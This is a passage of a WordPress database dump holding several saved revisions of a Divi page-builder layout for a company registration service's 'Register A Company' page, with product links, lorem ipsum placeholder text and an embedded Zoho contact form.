box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" link_option_url=\"https://companyregistration.online/shop/company-registration/private-company-with-a-standard-moi-basic/\" hover_enabled=\"0\" locked=\"off\" _i=\"0\" _address=\"1.1.0\" animation_style=\"slide\" animation_direction=\"left\" animation_delay=\"100ms\"][/et_pb_blurb][et_pb_blurb title=\"Private Company With Customized MOI\" url=\"https://companyregistration.online/shop/company-registration/private-company-customised-moi-full/\" use_icon=\"on\" font_icon=\"%%144%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"50px\" _builder_version=\"3.27.3\" header_font=\"Poppins|600||on|||||\" header_font_size=\"16px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" link_option_url=\"https://companyregistration.online/shop/company-registration/private-company-customised-moi-full/\" hover_enabled=\"0\" locked=\"off\" _i=\"1\" _address=\"1.1.1\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"300ms\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_tablet__hover=\"0px||\" padding_last_edited__hover=\"on|desktop\" padding_top__hover=\"100px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" _i=\"2\" _address=\"1.2\"][et_pb_blurb title=\"Personal Liability Company\" url=\"https://companyregistration.online/shop/company-registration/personal-liability-company/\" use_icon=\"on\" font_icon=\"%%144%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"50px\" _builder_version=\"3.27.3\" header_font=\"Poppins|600||on|||||\" header_font_size=\"16px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" link_option_url=\"https://companyregistration.online/shop/company-registration/personal-liability-company/\" hover_enabled=\"0\" locked=\"off\" _i=\"0\" _address=\"1.2.0\" animation_style=\"slide\" animation_direction=\"right\" animation_delay=\"200ms\"][/et_pb_blurb][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Call to Action\" _builder_version=\"3.26.6\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#edf8ff\" width=\"93%\" module_alignment=\"center\" custom_padding=\"||\" custom_padding_tablet=\"|0vw|30vw|\" bottom_divider_color=\"#ffffff\" bottom_divider_height=\"24vw\" bottom_divider_repeat=\"0.6x\" bottom_divider_flip=\"vertical|horizontal\" bottom_divider_arrangement=\"above_content\" locked=\"off\" fb_built=\"1\" _i=\"2\" _address=\"2\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"2\" _builder_version=\"3.25\" width=\"100%\" max_width=\"100%\" use_custom_width=\"on\" width_unit=\"off\" custom_width_percent=\"100%\" _i=\"0\" _address=\"2.0\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"2.0.0\"][et_pb_text _builder_version=\"3.26.6\" text_font=\"||||||||\" text_font_size=\"21px\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_text_align=\"center\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\" _i=\"0\" _address=\"2.0.0.0\"]<h2>Not Exactly Sure What To Do?</h2>\n<p style=\"text-align: center;\">Fill our contact form and a consultant will get contact you to better discuss what services your company requires</p>[/et_pb_text][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-19.png\" show_bottom_space=\"off\" _builder_version=\"3.23\" max_width_tablet=\"400px\" max_width_last_edited=\"on|tablet\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"1%\" always_center_on_mobile=\"off\" _i=\"1\" _address=\"2.0.0.1\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|10vw||\" custom_padding_tablet=\"|10vw||10vw||true\" custom_padding_last_edited=\"on|tablet\" custom_padding__hover=\"|||\" _i=\"1\" _address=\"2.0.1\"][et_pb_text _builder_version=\"3.26.6\" _i=\"0\" _address=\"2.0.1.0\"]<iframe frameborder=\"0\" style=\"height: 720px; width: 99%; border: none;\" src=\"https://forms.zohopublic.com/mawincnetwork/form/ContactForm/formperma/mgyNovoEJpAyVGAXfwsVHV_TgNG-DKU904Sz1B2Verw\"></iframe>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Company Registrations','','inherit','closed','closed','','32664-revision-v1','','','2019-08-22 15:07:20','2019-08-22 13:07:20','',32664,'https://companyregistration.online/32664-revision-v1/',0,'revision','',0),(33121,1,'2019-08-22 15:51:06','2019-08-22 13:51:06','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"3.22\" custom_width_px__hover=\"1080px\" custom_width_px__hover_enabled=\"1080px\" custom_width_percent__hover=\"80%\" custom_width_percent__hover_enabled=\"80%\" locked=\"off\" fb_built=\"1\" parallax_1__hover=\"off\" parallax_1__hover_enabled=\"off\" parallax_2__hover=\"off\" parallax_2__hover_enabled=\"off\" parallax_3__hover=\"off\" parallax_3__hover_enabled=\"off\" parallax_method_1__hover=\"on\" parallax_method_1__hover_enabled=\"on\" parallax_method_2__hover=\"on\" parallax_method_2__hover_enabled=\"on\" parallax_method_3__hover=\"on\" parallax_method_3__hover_enabled=\"on\" use_background_color_gradient__hover=\"off\" use_background_color_gradient__hover_enabled=\"off\" background_color_gradient_start__hover=\"#2b87da\" background_color_gradient_start__hover_enabled=\"#2b87da\" background_color_gradient_end__hover=\"#29c4a9\" background_color_gradient_end__hover_enabled=\"#29c4a9\" background_color_gradient_type__hover=\"linear\" background_color_gradient_type__hover_enabled=\"linear\" background_color_gradient_direction__hover=\"180deg\" background_color_gradient_direction__hover_enabled=\"180deg\" background_color_gradient_direction_radial__hover=\"center\" background_color_gradient_direction_radial__hover_enabled=\"center\" background_color_gradient_start_position__hover=\"0%\" background_color_gradient_start_position__hover_enabled=\"0%\" background_color_gradient_end_position__hover=\"100%\" background_color_gradient_end_position__hover_enabled=\"100%\" background_color_gradient_overlays_image__hover=\"off\" background_color_gradient_overlays_image__hover_enabled=\"off\" parallax__hover=\"off\" parallax__hover_enabled=\"off\" parallax_method__hover=\"on\" parallax_method__hover_enabled=\"on\" background_size__hover=\"cover\" background_size__hover_enabled=\"cover\" background_position__hover=\"center\" background_position__hover_enabled=\"center\" background_repeat__hover=\"no-repeat\" background_repeat__hover_enabled=\"no-repeat\" background_blend__hover=\"normal\" background_blend__hover_enabled=\"normal\" allow_player_pause__hover=\"off\" allow_player_pause__hover_enabled=\"off\" background_video_pause_outside_viewport__hover=\"on\" background_video_pause_outside_viewport__hover_enabled=\"on\" inner_shadow__hover=\"off\" inner_shadow__hover_enabled=\"off\" make_fullwidth__hover=\"off\" make_fullwidth__hover_enabled=\"off\" use_custom_width__hover=\"off\" use_custom_width__hover_enabled=\"off\" width_unit__hover=\"on\" width_unit__hover_enabled=\"on\" make_equal__hover=\"off\" make_equal__hover_enabled=\"off\" use_custom_gutter__hover=\"off\" use_custom_gutter__hover_enabled=\"off\" gutter_width__hover=\"3\" gutter_width__hover_enabled=\"3\" border_radii__hover=\"on||||\" border_radii__hover_enabled=\"on||||\" box_shadow_style__hover=\"none\" box_shadow_style__hover_enabled=\"none\" box_shadow_color__hover=\"rgba(0,0,0,0.3)\" box_shadow_color__hover_enabled=\"rgba(0,0,0,0.3)\" max_width__hover=\"100%\" max_width__hover_enabled=\"100%\" filter_hue_rotate__hover=\"0deg\" filter_hue_rotate__hover_enabled=\"0deg\" filter_saturate__hover=\"100%\" filter_saturate__hover_enabled=\"100%\" filter_brightness__hover=\"100%\" filter_brightness__hover_enabled=\"100%\" filter_contrast__hover=\"100%\" filter_contrast__hover_enabled=\"100%\" filter_invert__hover=\"0%\" filter_invert__hover_enabled=\"0%\" filter_sepia__hover=\"0%\" filter_sepia__hover_enabled=\"0%\" filter_opacity__hover=\"100%\" filter_opacity__hover_enabled=\"100%\" filter_blur__hover=\"0px\" filter_blur__hover_enabled=\"0px\" mix_blend_mode__hover=\"normal\" mix_blend_mode__hover_enabled=\"normal\" animation_style__hover=\"none\" animation_style__hover_enabled=\"none\" animation_repeat__hover=\"once\" animation_repeat__hover_enabled=\"once\" animation_direction__hover=\"center\" animation_direction__hover_enabled=\"center\" animation_duration__hover=\"1000ms\" animation_duration__hover_enabled=\"1000ms\" animation_delay__hover=\"0ms\" animation_delay__hover_enabled=\"0ms\" animation_intensity_slide__hover=\"50%\" animation_intensity_slide__hover_enabled=\"50%\" animation_intensity_zoom__hover=\"50%\" animation_intensity_zoom__hover_enabled=\"50%\" animation_intensity_flip__hover=\"50%\" animation_intensity_flip__hover_enabled=\"50%\" animation_intensity_fold__hover=\"50%\" animation_intensity_fold__hover_enabled=\"50%\" animation_intensity_roll__hover=\"50%\" animation_intensity_roll__hover_enabled=\"50%\" animation_starting_opacity__hover=\"0%\" animation_starting_opacity__hover_enabled=\"0%\" animation_speed_curve__hover=\"ease-in-out\" animation_speed_curve__hover_enabled=\"ease-in-out\" hover_transition_duration__hover=\"300ms\" hover_transition_duration__hover_enabled=\"300ms\" hover_transition_delay__hover=\"0ms\" hover_transition_delay__hover_enabled=\"0ms\" hover_transition_speed_curve__hover=\"ease\" hover_transition_speed_curve__hover_enabled=\"ease\" _i=\"0\" _address=\"0\"][et_pb_row _builder_version=\"3.25\" width=\"87.3%\" custom_margin=\"|auto||181px||\" locked=\"off\" _i=\"0\" _address=\"0.0\" custom_padding=\"3px|||||\"][et_pb_column type=\"4_4\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"0.0.0\"][et_pb_divider color=\"#1ca5ff\" divider_weight=\"16px\" _builder_version=\"3.19.6\" max_width=\"48px\" locked=\"off\" _i=\"0\" _address=\"0.0.0.0\"][/et_pb_divider][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"50px\" header_line_height=\"1.3em\" width=\"100%\" custom_margin=\"-14px||-12px|||\" header_font_size_tablet=\"30px\" header_font_size_phone=\"24px\" header_font_size_last_edited=\"on|desktop\" _i=\"1\" _address=\"0.0.0.1\" min_height=\"67px\" custom_padding=\"0px|||||\"]<h1>Register A Company</h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" custom_margin=\"-36px|auto|0px|auto||\" _i=\"1\" _address=\"0.1\" custom_padding=\"9px|||||\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"0.1.0\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-23.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" _i=\"0\" _address=\"0.1.0.0\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" specialty=\"on\" padding_top_1=\"200px\" padding_top_3=\"100px\" padding_1_tablet=\"0px||\" padding_3_tablet=\"0px||\" padding_1_last_edited=\"on|tablet\" padding_3_last_edited=\"on|desktop\" admin_label=\"About\" _builder_version=\"3.22\" custom_margin=\"||-2px|||\" custom_padding=\"0px|||||\" fb_built=\"1\" _i=\"1\" _address=\"1\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_tablet__hover=\"0px||\" padding_last_edited__hover=\"on|tablet\" padding_top__hover=\"200px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"1.0\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px|||||\" _i=\"0\" _address=\"1.0.0\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"1.0.0.0\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" module_alignment=\"center\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\" _i=\"0\" _address=\"1.0.0.0.0\"]<h2>What Company Type Do I Need ?</h2>[/et_pb_text][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" text_font_size_tablet=\"14px\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"off|tablet\" locked=\"off\" _i=\"1\" _address=\"1.0.0.0.1\"]<p>Mauris blandit aliquet elit, eget tincidunt nibh pulvinar a. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Donec velit neque, auctor sit amet aliquam vel, ullamcorper sit amet ligula. Curabitur arcu erat, accumsan id imperdiet et, porttitor at sem. Nulla quis lorem ut l</p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" _i=\"1\" _address=\"1.1\"][et_pb_blurb title=\"Private Company\" url=\"https://companyregistration.online/shop/company-registration/private-company-with-a-standard-moi-basic/\" use_icon=\"on\" font_icon=\"%%144%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"50px\" _builder_version=\"3.27.3\" header_font=\"Poppins|600||on|||||\" header_font_size=\"16px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" animation_style=\"slide\" animation_direction=\"left\" animation_delay=\"200ms\" link_option_url=\"https://companyregistration.online/shop/company-registration/private-company-with-a-standard-moi-basic/\" locked=\"off\" _i=\"0\" _address=\"1.1.0\"][/et_pb_blurb][et_pb_blurb title=\"Private Company With Customized MOI\" url=\"https://companyregistration.online/shop/company-registration/private-company-customised-moi-full/\" use_icon=\"on\" font_icon=\"%%144%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"50px\" _builder_version=\"3.27.3\" header_font=\"Poppins|600||on|||||\" header_font_size=\"16px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"600ms\" link_option_url=\"https://companyregistration.online/shop/company-registration/private-company-customised-moi-full/\" locked=\"off\" _i=\"1\" _address=\"1.1.1\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_tablet__hover=\"0px||\" padding_last_edited__hover=\"on|desktop\" padding_top__hover=\"100px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" _i=\"2\" _address=\"1.2\"][et_pb_blurb title=\"Personal Liability Company\" url=\"https://companyregistration.online/shop/company-registration/personal-liability-company/\" use_icon=\"on\" font_icon=\"%%144%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"50px\" _builder_version=\"3.27.3\" header_font=\"Poppins|600||on|||||\" header_font_size=\"16px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" animation_style=\"slide\" animation_direction=\"right\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/shop/company-registration/personal-liability-company/\" locked=\"off\" _i=\"0\" _address=\"1.2.0\"][/et_pb_blurb][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Call to Action\" _builder_version=\"3.26.6\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#edf8ff\" width=\"93%\" module_alignment=\"center\" custom_padding=\"||\" custom_padding_tablet=\"|0vw|30vw|\" bottom_divider_color=\"#ffffff\" bottom_divider_height=\"24vw\" bottom_divider_repeat=\"0.6x\" bottom_divider_flip=\"vertical|horizontal\" bottom_divider_arrangement=\"above_content\" locked=\"off\" fb_built=\"1\" _i=\"2\" _address=\"2\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"2\" _builder_version=\"3.25\" width=\"100%\" max_width=\"100%\" use_custom_width=\"on\" width_unit=\"off\" custom_width_percent=\"100%\" _i=\"0\" _address=\"2.0\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"2.0.0\"][et_pb_text _builder_version=\"3.26.6\" text_font=\"||||||||\" text_font_size=\"21px\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_text_align=\"center\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\" _i=\"0\" _address=\"2.0.0.0\"]<h2>Not Exactly Sure What To Do?</h2>\n<p style=\"text-align: center;\">Fill our contact form and a consultant will get contact you to better discuss what services your company requires</p>[/et_pb_text][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-19.png\" show_bottom_space=\"off\" _builder_version=\"3.27.3\" max_width_tablet=\"400px\" max_width_last_edited=\"on|tablet\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"10%\" always_center_on_mobile=\"off\" _i=\"1\" _address=\"2.0.0.1\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|10vw||\" custom_padding_tablet=\"|10vw||10vw||true\" custom_padding_last_edited=\"on|tablet\" custom_padding__hover=\"|||\" _i=\"1\" _address=\"2.0.1\"][et_pb_text _builder_version=\"3.26.6\" _i=\"0\" _address=\"2.0.1.0\"]<iframe frameborder=\"0\" style=\"height: 720px; width: 99%; border: none;\" src=\"https://forms.zohopublic.com/mawincnetwork/form/ContactForm/formperma/mgyNovoEJpAyVGAXfwsVHV_TgNG-DKU904Sz1B2Verw\"></iframe>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Company Registrations','','inherit','closed','closed','','32664-revision-v1','','','2019-08-22 15:51:06','2019-08-22 13:51:06','',32664,'https://companyregistration.online/32664-revision-v1/',0,'revision','',0),(33114,1,'2019-08-22 15:11:13','2019-08-22 13:11:13','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"3.22\" custom_width_px__hover=\"1080px\" custom_width_px__hover_enabled=\"1080px\" custom_width_percent__hover=\"80%\" custom_width_percent__hover_enabled=\"80%\" locked=\"off\" fb_built=\"1\" parallax_1__hover=\"off\" parallax_1__hover_enabled=\"off\" parallax_2__hover=\"off\" parallax_2__hover_enabled=\"off\" parallax_3__hover=\"off\" parallax_3__hover_enabled=\"off\" parallax_method_1__hover=\"on\" parallax_method_1__hover_enabled=\"on\" parallax_method_2__hover=\"on\" parallax_method_2__hover_enabled=\"on\" parallax_method_3__hover=\"on\" parallax_method_3__hover_enabled=\"on\" use_background_color_gradient__hover=\"off\" use_background_color_gradient__hover_enabled=\"off\" background_color_gradient_start__hover=\"#2b87da\" background_color_gradient_start__hover_enabled=\"#2b87da\" background_color_gradient_end__hover=\"#29c4a9\" background_color_gradient_end__hover_enabled=\"#29c4a9\" background_color_gradient_type__hover=\"linear\" background_color_gradient_type__hover_enabled=\"linear\" background_color_gradient_direction__hover=\"180deg\" background_color_gradient_direction__hover_enabled=\"180deg\" background_color_gradient_direction_radial__hover=\"center\" background_color_gradient_direction_radial__hover_enabled=\"center\" background_color_gradient_start_position__hover=\"0%\" background_color_gradient_start_position__hover_enabled=\"0%\" background_color_gradient_end_position__hover=\"100%\" background_color_gradient_end_position__hover_enabled=\"100%\" background_color_gradient_overlays_image__hover=\"off\" background_color_gradient_overlays_image__hover_enabled=\"off\" parallax__hover=\"off\" parallax__hover_enabled=\"off\" parallax_method__hover=\"on\" parallax_method__hover_enabled=\"on\" background_size__hover=\"cover\" background_size__hover_enabled=\"cover\" background_position__hover=\"center\" background_position__hover_enabled=\"center\" background_repeat__hover=\"no-repeat\" background_repeat__hover_enabled=\"no-repeat\" background_blend__hover=\"normal\" background_blend__hover_enabled=\"normal\" allow_player_pause__hover=\"off\" allow_player_pause__hover_enabled=\"off\" background_video_pause_outside_viewport__hover=\"on\" background_video_pause_outside_viewport__hover_enabled=\"on\" inner_shadow__hover=\"off\" inner_shadow__hover_enabled=\"off\" make_fullwidth__hover=\"off\" make_fullwidth__hover_enabled=\"off\" use_custom_width__hover=\"off\" use_custom_width__hover_enabled=\"off\" width_unit__hover=\"on\" width_unit__hover_enabled=\"on\" make_equal__hover=\"off\" make_equal__hover_enabled=\"off\" use_custom_gutter__hover=\"off\" use_custom_gutter__hover_enabled=\"off\" gutter_width__hover=\"3\" gutter_width__hover_enabled=\"3\" border_radii__hover=\"on||||\" border_radii__hover_enabled=\"on||||\" box_shadow_style__hover=\"none\" box_shadow_style__hover_enabled=\"none\" box_shadow_color__hover=\"rgba(0,0,0,0.3)\" box_shadow_color__hover_enabled=\"rgba(0,0,0,0.3)\" max_width__hover=\"100%\" max_width__hover_enabled=\"100%\" filter_hue_rotate__hover=\"0deg\" filter_hue_rotate__hover_enabled=\"0deg\" filter_saturate__hover=\"100%\" filter_saturate__hover_enabled=\"100%\" filter_brightness__hover=\"100%\" filter_brightness__hover_enabled=\"100%\" filter_contrast__hover=\"100%\" filter_contrast__hover_enabled=\"100%\" filter_invert__hover=\"0%\" filter_invert__hover_enabled=\"0%\" filter_sepia__hover=\"0%\" filter_sepia__hover_enabled=\"0%\" filter_opacity__hover=\"100%\" filter_opacity__hover_enabled=\"100%\" filter_blur__hover=\"0px\" filter_blur__hover_enabled=\"0px\" mix_blend_mode__hover=\"normal\" mix_blend_mode__hover_enabled=\"normal\" animation_style__hover=\"none\" animation_style__hover_enabled=\"none\" animation_repeat__hover=\"once\" animation_repeat__hover_enabled=\"once\" animation_direction__hover=\"center\" animation_direction__hover_enabled=\"center\" animation_duration__hover=\"1000ms\" animation_duration__hover_enabled=\"1000ms\" animation_delay__hover=\"0ms\" animation_delay__hover_enabled=\"0ms\" animation_intensity_slide__hover=\"50%\" animation_intensity_slide__hover_enabled=\"50%\" animation_intensity_zoom__hover=\"50%\" animation_intensity_zoom__hover_enabled=\"50%\" animation_intensity_flip__hover=\"50%\" animation_intensity_flip__hover_enabled=\"50%\" animation_intensity_fold__hover=\"50%\" animation_intensity_fold__hover_enabled=\"50%\" animation_intensity_roll__hover=\"50%\" animation_intensity_roll__hover_enabled=\"50%\" animation_starting_opacity__hover=\"0%\" animation_starting_opacity__hover_enabled=\"0%\" animation_speed_curve__hover=\"ease-in-out\" animation_speed_curve__hover_enabled=\"ease-in-out\" hover_transition_duration__hover=\"300ms\" hover_transition_duration__hover_enabled=\"300ms\" hover_transition_delay__hover=\"0ms\" hover_transition_delay__hover_enabled=\"0ms\" hover_transition_speed_curve__hover=\"ease\" hover_transition_speed_curve__hover_enabled=\"ease\" _i=\"0\" _address=\"0\"][et_pb_row _builder_version=\"3.25\" width=\"87.3%\" custom_margin=\"|auto||181px||\" locked=\"off\" _i=\"0\" _address=\"0.0\"][et_pb_column type=\"4_4\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"0.0.0\"][et_pb_divider color=\"#1ca5ff\" divider_weight=\"16px\" _builder_version=\"3.19.6\" max_width=\"48px\" locked=\"off\" _i=\"0\" _address=\"0.0.0.0\"][/et_pb_divider][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"50px\" header_line_height=\"1.3em\" width=\"100%\" custom_margin=\"||-12px|||\" header_font_size_tablet=\"30px\" header_font_size_phone=\"24px\" header_font_size_last_edited=\"on|desktop\" _i=\"1\" _address=\"0.0.0.1\"]<h1>Register A Company</h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" custom_margin=\"|auto|0px|auto||\" _i=\"1\" _address=\"0.1\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"0.1.0\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-23.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" _i=\"0\" _address=\"0.1.0.0\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" specialty=\"on\" padding_top_1=\"200px\" padding_top_3=\"100px\" padding_1_tablet=\"0px||\" padding_3_tablet=\"0px||\" padding_1_last_edited=\"on|tablet\" padding_3_last_edited=\"on|desktop\" admin_label=\"About\" _builder_version=\"3.22\" custom_margin=\"||-2px|||\" custom_padding=\"0px|||||\" fb_built=\"1\" _i=\"1\" _address=\"1\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_tablet__hover=\"0px||\" padding_last_edited__hover=\"on|tablet\" padding_top__hover=\"200px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"1.0\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px|||||\" _i=\"0\" _address=\"1.0.0\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"1.0.0.0\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" module_alignment=\"center\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\" _i=\"0\" _address=\"1.0.0.0.0\"]<h2>What Company Type Do I Need ?</h2>[/et_pb_text][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" text_font_size_tablet=\"14px\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"off|tablet\" locked=\"off\" _i=\"1\" _address=\"1.0.0.0.1\"]<p>Mauris blandit aliquet elit, eget tincidunt nibh pulvinar a. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Donec velit neque, auctor sit amet aliquam vel, ullamcorper sit amet ligula. Curabitur arcu erat, accumsan id imperdiet et, porttitor at sem. Nulla quis lorem ut l</p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" _i=\"1\" _address=\"1.1\"][et_pb_blurb title=\"Private Company\" url=\"https://companyregistration.online/shop/company-registration/private-company-with-a-standard-moi-basic/\" use_icon=\"on\" font_icon=\"%%144%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"50px\" _builder_version=\"3.27.3\" header_font=\"Poppins|600||on|||||\" header_font_size=\"16px\" 